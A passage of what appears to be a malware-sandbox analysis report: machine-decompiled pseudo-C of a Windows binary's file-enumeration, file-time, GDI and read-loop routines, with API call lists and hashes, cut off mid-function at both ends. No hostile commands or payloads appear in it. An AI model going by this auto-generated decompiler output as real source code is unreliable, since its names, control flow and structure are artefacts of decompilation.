                                                    									 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x2c))))();
                                                    									_t130 = _v224;
                                                    									 *0xcf3278(_t130, _v232, _v116, _t198, 3);
                                                    									 *((intOrPtr*)( *_t130 + 0x20))();
                                                    									_t133 = _v136;
                                                    									_t169 = _v244;
                                                    									_v216 = _t198;
                                                    									_v220 = _t133;
                                                    									_v228 = 0;
                                                    									_v224 = 0;
                                                    									 *0xcf3278(_t169,  &_v228, _t133 << 2, _t198 * _t133 << 2, _v232);
                                                    									if( *((intOrPtr*)( *_t169 + 0x1c))() < 0) {
                                                    										DeleteObject(_v260);
                                                    									} else {
                                                    										_v256 = _v260;
                                                    									}
                                                    									_t139 = _v268;
                                                    									 *0xcf3278(_t139);
                                                    									 *((intOrPtr*)( *((intOrPtr*)( *_t139 + 8))))();
                                                    								}
                                                    								_t118 = _v224;
                                                    								 *0xcf3278(_t118);
                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 8))))();
                                                    								_t121 = _v224;
                                                    								 *0xcf3278(_t121);
                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))();
                                                    								_t124 = _v236;
                                                    								 *0xcf3278(_t124);
                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))();
                                                    								_t100 = _v220;
                                                    								if(_t100 != 0) {
                                                    									goto L22;
                                                    								} else {
                                                    									goto L21;
                                                    								}
                                                    							}
                                                    							_t143 = _v196;
                                                    							 *0xcf3278(_t143);
                                                    							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 8))))();
                                                    							goto L13;
                                                    						}
                                                    						goto L8;
                                                    					} else {
                                                    						_t180 = 0;
                                                    						L8:
                                                    						_t100 =  *0xd230e4(_t148, _t180, _t180, _t180, _t180);
                                                    						L23:
                                                    						return _t100;
                                                    					}
                                                    				}
                                                    				_push(_a12);
                                                    				_push(_a8);
                                                    				_push(_a4);
                                                    				return E00CDAAC9();
                                                    			}
                                                    0x00cdaa03
                                                    0x00cdaa06
                                                    0x00cdaa11
                                                    0x00cdaa15
                                                    0x00cdaa1c
                                                    0x00cdaa23
                                                    0x00cdaa27
                                                    0x00cdaa3b
                                                    0x00cdaa46
                                                    0x00cdaa56
                                                    0x00cdaa48
                                                    0x00cdaa4c
                                                    0x00cdaa4c
                                                    0x00cdaa5c
                                                    0x00cdaa68
                                                    0x00cdaa6e
                                                    0x00cdaa6e
                                                    0x00cdaa70
                                                    0x00cdaa7c
                                                    0x00cdaa82
                                                    0x00cdaa84
                                                    0x00cdaa90
                                                    0x00cdaa96
                                                    0x00cdaa98
                                                    0x00cdaaa4
                                                    0x00cdaaaa
                                                    0x00cdaaac
                                                    0x00cdaab2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdaab2
                                                    0x00cda914
                                                    0x00cda920
                                                    0x00cda926
                                                    0x00000000
                                                    0x00cda926
                                                    0x00000000
                                                    0x00cda874
                                                    0x00cda874
                                                    0x00cda898
                                                    0x00cda89d
                                                    0x00cdaac0
                                                    0x00000000
                                                    0x00cdaac2
                                                    0x00cda86c
                                                    0x00cda818
                                                    0x00cda81c
                                                    0x00cda820
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 00CDA699: GetDC.USER32(00000000), ref: 00CDA69D
                                                      • Part of subcall function 00CDA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CDA6A8
                                                      • Part of subcall function 00CDA699: ReleaseDC.USER32(00000000,00000000), ref: 00CDA6B3
                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00CDA83C
                                                      • Part of subcall function 00CDAAC9: GetDC.USER32(00000000), ref: 00CDAAD2
                                                      • Part of subcall function 00CDAAC9: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,00CDA829,?,?,?), ref: 00CDAB01
                                                      • Part of subcall function 00CDAAC9: ReleaseDC.USER32(00000000,?), ref: 00CDAB99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ObjectRelease$CapsDevice
                                                    • String ID: (
                                                    • API String ID: 1061551593-3887548279
                                                    • Opcode ID: 1849bab8fa63c7581bf0a0eceadd55c04fc8caab172e6b69b323412777e70804
                                                    • Instruction ID: d2a442841180164461a85e03a1d30f6f47b70ab2b3609298fa9aa6aedbca9de7
                                                    • Opcode Fuzzy Hash: 1849bab8fa63c7581bf0a0eceadd55c04fc8caab172e6b69b323412777e70804
                                                    • Instruction Fuzzy Hash: C091D275604354AFD610DF25C848A2BBBE8FFC9710F00491EFA9AD3261DB30A946DF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E00CEB1B8(signed int _a4, signed int _a8, intOrPtr _a12) {
                                                    				intOrPtr _v0;
                                                    				char _v6;
                                                    				char _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				signed int _v24;
                                                    				signed int _v28;
                                                    				signed int _v36;
                                                    				intOrPtr* _v64;
                                                    				intOrPtr _v96;
                                                    				intOrPtr* _v100;
                                                    				CHAR* _v104;
                                                    				signed int _v116;
                                                    				char _v290;
                                                    				signed int _v291;
                                                    				struct _WIN32_FIND_DATAA _v336;
                                                    				union _FINDEX_INFO_LEVELS _v340;
                                                    				signed int _v344;
                                                    				signed int _v348;
                                                    				intOrPtr _v440;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				intOrPtr* _t80;
                                                    				signed int _t82;
                                                    				signed int _t87;
                                                    				signed int _t91;
                                                    				signed int _t93;
                                                    				signed int _t95;
                                                    				signed int _t96;
                                                    				signed int _t100;
                                                    				signed int _t103;
                                                    				signed int _t108;
                                                    				signed int _t111;
                                                    				intOrPtr _t113;
                                                    				signed char _t115;
                                                    				union _FINDEX_INFO_LEVELS _t123;
                                                    				signed int _t128;
                                                    				signed int _t131;
                                                    				void* _t136;
                                                    				void* _t138;
                                                    				signed int _t139;
                                                    				signed int _t142;
                                                    				signed int _t144;
                                                    				signed int _t146;
                                                    				signed int* _t147;
                                                    				signed int _t150;
                                                    				void* _t153;
                                                    				CHAR* _t154;
                                                    				void* _t155;
                                                    				char _t157;
                                                    				char _t159;
                                                    				intOrPtr* _t162;
                                                    				void* _t163;
                                                    				intOrPtr* _t164;
                                                    				signed int _t166;
                                                    				void* _t168;
                                                    				intOrPtr* _t169;
                                                    				signed int _t173;
                                                    				signed int _t177;
                                                    				signed int _t178;
                                                    				intOrPtr* _t183;
                                                    				void* _t192;
                                                    				signed int _t194;
                                                    				signed int _t195;
                                                    				signed int _t197;
                                                    				signed int _t198;
                                                    				signed int _t200;
                                                    				union _FINDEX_INFO_LEVELS _t201;
                                                    				void* _t202;
                                                    				signed int _t206;
                                                    				signed int _t208;
                                                    				signed int _t209;
                                                    				void* _t211;
                                                    				intOrPtr _t212;
                                                    				void* _t213;
                                                    				void* _t214;
                                                    				signed int _t217;
                                                    				void* _t219;
                                                    				signed int _t220;
                                                    				void* _t221;
                                                    				void* _t222;
                                                    				void* _t223;
                                                    				signed int _t224;
                                                    				void* _t225;
                                                    				void* _t226;
                                                    
                                                    				_t80 = _a8;
                                                    				_t222 = _t221 - 0x20;
                                                    				if(_t80 != 0) {
                                                    					_t206 = _a4;
                                                    					_t159 = 0;
                                                    					 *_t80 = 0;
                                                    					_t197 = 0;
                                                    					_t150 = 0;
                                                    					_v36 = 0;
                                                    					_v336.cAlternateFileName = 0;
                                                    					_v28 = 0;
                                                    					__eflags =  *_t206;
                                                    					if( *_t206 == 0) {
                                                    						L9:
                                                    						_v12 = _v12 & 0x00000000;
                                                    						_t82 = _t150 - _t197;
                                                    						_v8 = _t159;
                                                    						_t190 = (_t82 >> 2) + 1;
                                                    						__eflags = _t150 - _t197;
                                                    						_v16 = (_t82 >> 2) + 1;
                                                    						asm("sbb esi, esi");
                                                    						_t208 =  !_t206 & _t82 + 0x00000003 >> 0x00000002;
                                                    						__eflags = _t208;
                                                    						if(_t208 != 0) {
                                                    							_t195 = _t197;
                                                    							_t157 = _t159;
                                                    							do {
                                                    								_t183 =  *_t195;
                                                    								_t17 = _t183 + 1; // 0x1
                                                    								_v8 = _t17;
                                                    								do {
                                                    									_t142 =  *_t183;
                                                    									_t183 = _t183 + 1;
                                                    									__eflags = _t142;
                                                    								} while (_t142 != 0);
                                                    								_t157 = _t157 + 1 + _t183 - _v8;
                                                    								_t195 = _t195 + 4;
                                                    								_t144 = _v12 + 1;
                                                    								_v12 = _t144;
                                                    								__eflags = _t144 - _t208;
                                                    							} while (_t144 != _t208);
                                                    							_t190 = _v16;
                                                    							_v8 = _t157;
                                                    							_t150 = _v336.cAlternateFileName;
                                                    						}
                                                    						_t209 = E00CE8207(_t190, _v8, 1);
                                                    						_t223 = _t222 + 0xc;
                                                    						__eflags = _t209;
                                                    						if(_t209 != 0) {
                                                    							_t87 = _t209 + _v16 * 4;
                                                    							_v20 = _t87;
                                                    							_t191 = _t87;
                                                    							_v16 = _t87;
                                                    							__eflags = _t197 - _t150;
                                                    							if(_t197 == _t150) {
                                                    								L23:
                                                    								_t198 = 0;
                                                    								__eflags = 0;
                                                    								 *_a8 = _t209;
                                                    								goto L24;
                                                    							} else {
                                                    								_t93 = _t209 - _t197;
                                                    								__eflags = _t93;
                                                    								_v24 = _t93;
                                                    								do {
                                                    									_t162 =  *_t197;
                                                    									_v12 = _t162 + 1;
                                                    									do {
                                                    										_t95 =  *_t162;
                                                    										_t162 = _t162 + 1;
                                                    										__eflags = _t95;
                                                    									} while (_t95 != 0);
                                                    									_t163 = _t162 - _v12;
                                                    									_t35 = _t163 + 1; // 0x1
                                                    									_t96 = _t35;
                                                    									_push(_t96);
                                                    									_v12 = _t96;
                                                    									_t100 = E00CEF101(_t163, _t191, _v20 - _t191 + _v8,  *_t197);
                                                    									_t223 = _t223 + 0x10;
                                                    									__eflags = _t100;
                                                    									if(_t100 != 0) {
                                                    										_push(0);
                                                    										_push(0);
                                                    										_push(0);
                                                    										_push(0);
                                                    										_push(0);
                                                    										E00CE9097();
                                                    										asm("int3");
                                                    										_t219 = _t223;
                                                    										_push(_t163);
                                                    										_t164 = _v64;
                                                    										_t47 = _t164 + 1; // 0x1
                                                    										_t192 = _t47;
                                                    										do {
                                                    											_t103 =  *_t164;
                                                    											_t164 = _t164 + 1;
                                                    											__eflags = _t103;
                                                    										} while (_t103 != 0);
                                                    										_push(_t197);
                                                    										_t200 = _a8;
                                                    										_t166 = _t164 - _t192 + 1;
                                                    										_v12 = _t166;
                                                    										__eflags = _t166 - (_t103 | 0xffffffff) - _t200;
                                                    										if(_t166 <= (_t103 | 0xffffffff) - _t200) {
                                                    											_push(_t150);
                                                    											_t50 = _t200 + 1; // 0x1
                                                    											_t153 = _t50 + _t166;
                                                    											_t211 = E00CEB136(_t166, _t153, 1);
                                                    											_t168 = _t209;
                                                    											__eflags = _t200;
                                                    											if(_t200 == 0) {
                                                    												L34:
                                                    												_push(_v12);
                                                    												_t153 = _t153 - _t200;
                                                    												_t108 = E00CEF101(_t168, _t211 + _t200, _t153, _v0);
                                                    												_t224 = _t223 + 0x10;
                                                    												__eflags = _t108;
                                                    												if(__eflags != 0) {
                                                    													goto L37;
                                                    												} else {
                                                    													_t136 = E00CEB587(_a12, _t192, __eflags, _t211);
                                                    													E00CE8DCC(0);
                                                    													_t138 = _t136;
                                                    													goto L36;
                                                    												}
                                                    											} else {
                                                    												_push(_t200);
                                                    												_t139 = E00CEF101(_t168, _t211, _t153, _a4);
                                                    												_t224 = _t223 + 0x10;
                                                    												__eflags = _t139;
                                                    												if(_t139 != 0) {
                                                    													L37:
                                                    													_push(0);
                                                    													_push(0);
                                                    													_push(0);
                                                    													_push(0);
                                                    													_push(0);
                                                    													E00CE9097();
                                                    													asm("int3");
                                                    													_push(_t219);
                                                    													_t220 = _t224;
                                                    													_t225 = _t224 - 0x150;
                                                    													_t111 =  *0xcfe7ac; // 0x349e4b74
                                                    													_v116 = _t111 ^ _t220;
                                                    													_t169 = _v100;
                                                    													_push(_t153);
                                                    													_t154 = _v104;
                                                    													_push(_t211);
                                                    													_t212 = _v96;
                                                    													_push(_t200);
                                                    													_v440 = _t212;
                                                    													while(1) {
                                                    														__eflags = _t169 - _t154;
                                                    														if(_t169 == _t154) {
                                                    															break;
                                                    														}
                                                    														_t113 =  *_t169;
                                                    														__eflags = _t113 - 0x2f;
                                                    														if(_t113 != 0x2f) {
                                                    															__eflags = _t113 - 0x5c;
                                                    															if(_t113 != 0x5c) {
                                                    																__eflags = _t113 - 0x3a;
                                                    																if(_t113 != 0x3a) {
                                                    																	_t169 = E00CEF150(_t154, _t169);
                                                    																	continue;
                                                    																}
                                                    															}
                                                    														}
                                                    														break;
                                                    													}
                                                    													_t193 =  *_t169;
                                                    													__eflags = _t193 - 0x3a;
                                                    													if(_t193 != 0x3a) {
                                                    														L47:
                                                    														_t201 = 0;
                                                    														__eflags = _t193 - 0x2f;
                                                    														if(_t193 == 0x2f) {
                                                    															L51:
                                                    															_t115 = 1;
                                                    															__eflags = 1;
                                                    														} else {
                                                    															__eflags = _t193 - 0x5c;
                                                    															if(_t193 == 0x5c) {
                                                    																goto L51;
                                                    															} else {
                                                    																__eflags = _t193 - 0x3a;
                                                    																if(_t193 == 0x3a) {
                                                    																	goto L51;
                                                    																} else {
                                                    																	_t115 = 0;
                                                    																}
                                                    															}
                                                    														}
                                                    														asm("sbb eax, eax");
                                                    														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
                                                    														E00CDFFF0(_t201,  &_v336, _t201, 0x140);
                                                    														_t226 = _t225 + 0xc;
                                                    														_t213 = FindFirstFileExA(_t154, _t201,  &_v336, _t201, _t201, _t201);
                                                    														_t123 = _v340;
                                                    														__eflags = _t213 - 0xffffffff;
                                                    														if(_t213 != 0xffffffff) {
                                                    															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                                                    															__eflags = _t173;
                                                    															_v348 = _t173 >> 2;
                                                    															do {
                                                    																__eflags = _v336.cFileName - 0x2e;
                                                    																if(_v336.cFileName != 0x2e) {
                                                    																	L64:
                                                    																	_push(_t123);
                                                    																	_push(_v344);
                                                    																	_t123 =  &(_v336.cFileName);
                                                    																	_push(_t154);
                                                    																	_push(_t123);
                                                    																	L28();
                                                    																	_t226 = _t226 + 0x10;
                                                    																	__eflags = _t123;
                                                    																	if(_t123 != 0) {
                                                    																		goto L54;
                                                    																	} else {
                                                    																		goto L65;
                                                    																	}
                                                    																} else {
                                                    																	_t177 = _v291;
                                                    																	__eflags = _t177;
                                                    																	if(_t177 == 0) {
                                                    																		goto L65;
                                                    																	} else {
                                                    																		__eflags = _t177 - 0x2e;
                                                    																		if(_t177 != 0x2e) {
                                                    																			goto L64;
                                                    																		} else {
                                                    																			__eflags = _v290;
                                                    																			if(_v290 == 0) {
                                                    																				goto L65;
                                                    																			} else {
                                                    																				goto L64;
                                                    																			}
                                                    																		}
                                                    																	}
                                                    																}
                                                    																goto L58;
                                                    																L65:
                                                    																_t128 = FindNextFileA(_t213,  &_v336);
                                                    																__eflags = _t128;
                                                    																_t123 = _v340;
                                                    															} while (_t128 != 0);
                                                    															_t193 =  *_t123;
                                                    															_t178 = _v348;
                                                    															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                                                    															__eflags = _t178 - _t131;
                                                    															if(_t178 != _t131) {
                                                    																E00CE6310(_t154, _t193 + _t178 * 4, _t131 - _t178, 4, E00CEB1A0);
                                                    															}
                                                    														} else {
                                                    															_push(_t123);
                                                    															_push(_t201);
                                                    															_push(_t201);
                                                    															_push(_t154);
                                                    															L28();
                                                    															L54:
                                                    															_t201 = _t123;
                                                    														}
                                                    														__eflags = _t213 - 0xffffffff;
                                                    														if(_t213 != 0xffffffff) {
                                                    															FindClose(_t213);
                                                    														}
                                                    														_t124 = _t201;
                                                    													} else {
                                                    														_t124 =  &(_t154[1]);
                                                    														__eflags = _t169 -  &(_t154[1]);
                                                    														if(_t169 ==  &(_t154[1])) {
                                                    															goto L47;
                                                    														} else {
                                                    															_push(_t212);
                                                    															_push(0);
                                                    															_push(0);
                                                    															_push(_t154);
                                                    															L28();
                                                    														}
                                                    													}
                                                    													L58:
                                                    													_pop(_t202);
                                                    													_pop(_t214);
                                                    													__eflags = _v16 ^ _t220;
                                                    													_pop(_t155);
                                                    													return E00CDFBBC(_t124, _t155, _v16 ^ _t220, _t193, _t202, _t214);
                                                    												} else {
                                                    													goto L34;
                                                    												}
                                                    											}
                                                    										} else {
                                                    											_t138 = 0xc;
                                                    											L36:
                                                    											return _t138;
                                                    										}
                                                    									} else {
                                                    										goto L22;
                                                    									}
                                                    									goto L68;
                                                    									L22:
                                                    									_t194 = _v16;
                                                    									 *((intOrPtr*)(_v24 + _t197)) = _t194;
                                                    									_t197 = _t197 + 4;
                                                    									_t191 = _t194 + _v12;
                                                    									_v16 = _t194 + _v12;
                                                    									__eflags = _t197 - _t150;
                                                    								} while (_t197 != _t150);
                                                    								goto L23;
                                                    							}
                                                    						} else {
                                                    							_t198 = _t197 | 0xffffffff;
                                                    							L24:
                                                    							E00CE8DCC(0);
                                                    							goto L25;
                                                    						}
                                                    					} else {
                                                    						while(1) {
                                                    							_v8 = 0x3f2a;
                                                    							_v6 = _t159;
                                                    							_t146 = E00CEF110( *_t206,  &_v8);
                                                    							__eflags = _t146;
                                                    							if(_t146 != 0) {
                                                    								_push( &_v36);
                                                    								_push(_t146);
                                                    								_push( *_t206);
                                                    								L38();
                                                    								_t222 = _t222 + 0xc;
                                                    							} else {
                                                    								_t146 =  &_v36;
                                                    								_push(_t146);
                                                    								_push(0);
                                                    								_push(0);
                                                    								_push( *_t206);
                                                    								L28();
                                                    								_t222 = _t222 + 0x10;
                                                    							}
                                                    							_t198 = _t146;
                                                    							__eflags = _t198;
                                                    							if(_t198 != 0) {
                                                    								break;
                                                    							}
                                                    							_t206 = _t206 + 4;
                                                    							_t159 = 0;
                                                    							__eflags =  *_t206;
                                                    							if( *_t206 != 0) {
                                                    								continue;
                                                    							} else {
                                                    								_t150 = _v336.cAlternateFileName;
                                                    								_t197 = _v36;
                                                    								goto L9;
                                                    							}
                                                    							goto L68;
                                                    						}
                                                    						L25:
                                                    						E00CEB562( &_v36);
                                                    						_t91 = _t198;
                                                    						goto L26;
                                                    					}
                                                    				} else {
                                                    					_t147 = E00CE91A8();
                                                    					_t217 = 0x16;
                                                    					 *_t147 = _t217;
                                                    					E00CE9087();
                                                    					_t91 = _t217;
                                                    					L26:
                                                    					return _t91;
                                                    				}
                                                    				L68:
                                                    			}

                                                    0x00ceb23f
                                                    0x00ceb242
                                                    0x00ceb244
                                                    0x00ceb246
                                                    0x00000000
                                                    0x00ceb248
                                                    0x00ceb248
                                                    0x00ceb24b
                                                    0x00000000
                                                    0x00ceb24b
                                                    0x00000000
                                                    0x00ceb246
                                                    0x00ceb32a
                                                    0x00ceb32d
                                                    0x00ceb332
                                                    0x00000000
                                                    0x00ceb335
                                                    0x00ceb1c8
                                                    0x00ceb1c8
                                                    0x00ceb1cf
                                                    0x00ceb1d0
                                                    0x00ceb1d2
                                                    0x00ceb1d7
                                                    0x00ceb336
                                                    0x00ceb33a
                                                    0x00ceb33a
                                                    0x00000000

                                                    APIs
                                                    • _free.LIBCMT ref: 00CEB324
                                                      • Part of subcall function 00CE9097: IsProcessorFeaturePresent.KERNEL32(00000017,00CE9086,00000000,00CE8D94,00000000,00000000,00000000,00000016,?,?,00CE9093,00000000,00000000,00000000,00000000,00000000), ref: 00CE9099
                                                      • Part of subcall function 00CE9097: GetCurrentProcess.KERNEL32(C0000417,00CE8D94,00000000,?,00000003,00CE9868), ref: 00CE90BB
                                                      • Part of subcall function 00CE9097: TerminateProcess.KERNEL32(00000000,?,00000003,00CE9868), ref: 00CE90C2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                    • String ID: *?$.
                                                    • API String ID: 2667617558-3972193922
                                                    • Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                    • Instruction ID: cc257a6439974cd86290317cb8f2dd9085f0f90b5fc542a2f2bce62bd0be310c
                                                    • Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                    • Instruction Fuzzy Hash: C551B371E0024AEFDF14DFAAC881ABEB7B5EF58310F244169E954E7350EB319E019B50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E00CC75DE(void* __ecx) {
                                                    				void* __esi;
                                                    				char _t55;
                                                    				signed int _t58;
                                                    				void* _t62;
                                                    				signed int _t63;
                                                    				signed int _t69;
                                                    				signed int _t86;
                                                    				void* _t91;
                                                    				void* _t101;
                                                    				intOrPtr* _t106;
                                                    				void* _t108;
                                                    
                                                    				E00CDEB78(0xcf27e9, _t108);
                                                    				E00CDEC50(0x60f8);
                                                    				_t106 =  *((intOrPtr*)(_t108 + 0xc));
                                                    				if( *_t106 == 0) {
                                                    					L3:
                                                    					_t101 = 0x802;
                                                    					E00CD0602(_t108 - 0x1014, _t106, 0x802);
                                                    					L4:
                                                    					_t82 =  *((intOrPtr*)(_t108 + 8));
                                                    					E00CC77DF(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4094, 0x800);
                                                    					_t113 =  *((short*)(_t108 - 0x4094)) - 0x3a;
                                                    					if( *((short*)(_t108 - 0x4094)) == 0x3a) {
                                                    						__eflags =  *((char*)(_t108 + 0x10));
                                                    						if(__eflags == 0) {
                                                    							E00CD05DA(__eflags, _t108 - 0x1014, _t108 - 0x4094, _t101);
                                                    							E00CC6EDB(_t108 - 0x3094);
                                                    							_push(0);
                                                    							_t55 = E00CCA56D(_t108 - 0x3094, __eflags, _t106, _t108 - 0x3094);
                                                    							_t86 =  *(_t108 - 0x208c);
                                                    							 *((char*)(_t108 - 0xd)) = _t55;
                                                    							__eflags = _t86 & 0x00000001;
                                                    							if((_t86 & 0x00000001) != 0) {
                                                    								__eflags = _t86 & 0xfffffffe;
                                                    								E00CCA4ED(_t106, _t86 & 0xfffffffe);
                                                    							}
                                                    							E00CC9556(_t108 - 0x204c);
                                                    							 *((intOrPtr*)(_t108 - 4)) = 1;
                                                    							_t58 = E00CC9F1A(_t108 - 0x204c, __eflags, _t108 - 0x1014, 0x11);
                                                    							__eflags = _t58;
                                                    							if(_t58 != 0) {
                                                    								_push(0);
                                                    								_push(_t108 - 0x204c);
                                                    								_push(0);
                                                    								_t69 = E00CC3BBA(_t82);
                                                    								__eflags = _t69;
                                                    								if(_t69 != 0) {
                                                    									E00CC9620(_t108 - 0x204c);
                                                    								}
                                                    							}
                                                    							E00CC9556(_t108 - 0x50cc);
                                                    							__eflags =  *((char*)(_t108 - 0xd));
                                                    							 *((char*)(_t108 - 4)) = 2;
                                                    							if( *((char*)(_t108 - 0xd)) != 0) {
                                                    								_t63 = E00CC98E0(_t108 - 0x50cc, _t106, _t106, 5);
                                                    								__eflags = _t63;
                                                    								if(_t63 != 0) {
                                                    									SetFileTime( *(_t108 - 0x50c4), _t108 - 0x206c, _t108 - 0x2064, _t108 - 0x205c);
                                                    								}
                                                    							}
                                                    							E00CCA4ED(_t106,  *(_t108 - 0x208c));
                                                    							E00CC959A(_t108 - 0x50cc);
                                                    							_t91 = _t108 - 0x204c;
                                                    						} else {
                                                    							E00CC9556(_t108 - 0x6104);
                                                    							_push(1);
                                                    							_push(_t108 - 0x6104);
                                                    							_push(0);
                                                    							 *((intOrPtr*)(_t108 - 4)) = 0;
                                                    							E00CC3BBA(_t82);
                                                    							_t91 = _t108 - 0x6104;
                                                    						}
                                                    						_t62 = E00CC959A(_t91);
                                                    					} else {
                                                    						E00CC2021(_t113, 0x53, _t82 + 0x32, _t106);
                                                    						_t62 = E00CC6D83(0xd01098, 3);
                                                    					}
                                                    					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
                                                    					return _t62;
                                                    				}
                                                    				_t112 =  *((intOrPtr*)(_t106 + 2));
                                                    				if( *((intOrPtr*)(_t106 + 2)) != 0) {
                                                    					goto L3;
                                                    				} else {
                                                    					_t101 = 0x802;
                                                    					E00CD0602(_t108 - 0x1014, 0xcf37a0, 0x802);
                                                    					E00CD05DA(_t112, _t108 - 0x1014, _t106, 0x802);
                                                    					goto L4;
                                                    				}
                                                    			}


                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC75E3
                                                      • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                      • Part of subcall function 00CCA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CC777F
                                                      • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                      • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                    • String ID: :
                                                    • API String ID: 3226429890-336475711
                                                    • Opcode ID: 095fbd2c6699e147731f2a7796468cd8f49d6bb12f9d8cabd93d04ed73384edd
                                                    • Instruction ID: c638ec9dc1e7bee442f45cd3c7af10860d71cc1e18af2e116dc808a77c566db6
                                                    • Opcode Fuzzy Hash: 095fbd2c6699e147731f2a7796468cd8f49d6bb12f9d8cabd93d04ed73384edd
                                                    • Instruction Fuzzy Hash: 95416F71800158AAEB25EB64CD5AFEEB378EF45300F00819AF609A7192DB745F85DF71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 26%
                                                    			E00CDB48E(void* __ecx, void* __edx, void* __eflags, char _a3, char _a4, char _a7, char _a8, intOrPtr* _a8200) {
                                                    				void* __edi;
                                                    				void* __ebp;
                                                    				intOrPtr _t20;
                                                    				short* _t31;
                                                    				intOrPtr* _t33;
                                                    				signed int _t41;
                                                    				intOrPtr* _t42;
                                                    				void* _t44;
                                                    
                                                    				E00CDEC50(0x2004);
                                                    				_push(0x80000);
                                                    				_t42 = E00CE3E33(__ecx);
                                                    				if(_t42 == 0) {
                                                    					E00CC6CA7(0xd01098);
                                                    				}
                                                    				_t33 = _a8200;
                                                    				 *_t42 = 0;
                                                    				_t41 = 0;
                                                    				while(1) {
                                                    					_push(0x1000);
                                                    					_push( &_a3);
                                                    					_push(0);
                                                    					_push(0);
                                                    					_push( &_a4);
                                                    					_push( *_t33);
                                                    					_t20 = E00CDB314(_t41, 0);
                                                    					 *_t33 = _t20;
                                                    					if(_t20 == 0) {
                                                    						break;
                                                    					}
                                                    					if( *_t42 != 0 || _a8 != 0x7b) {
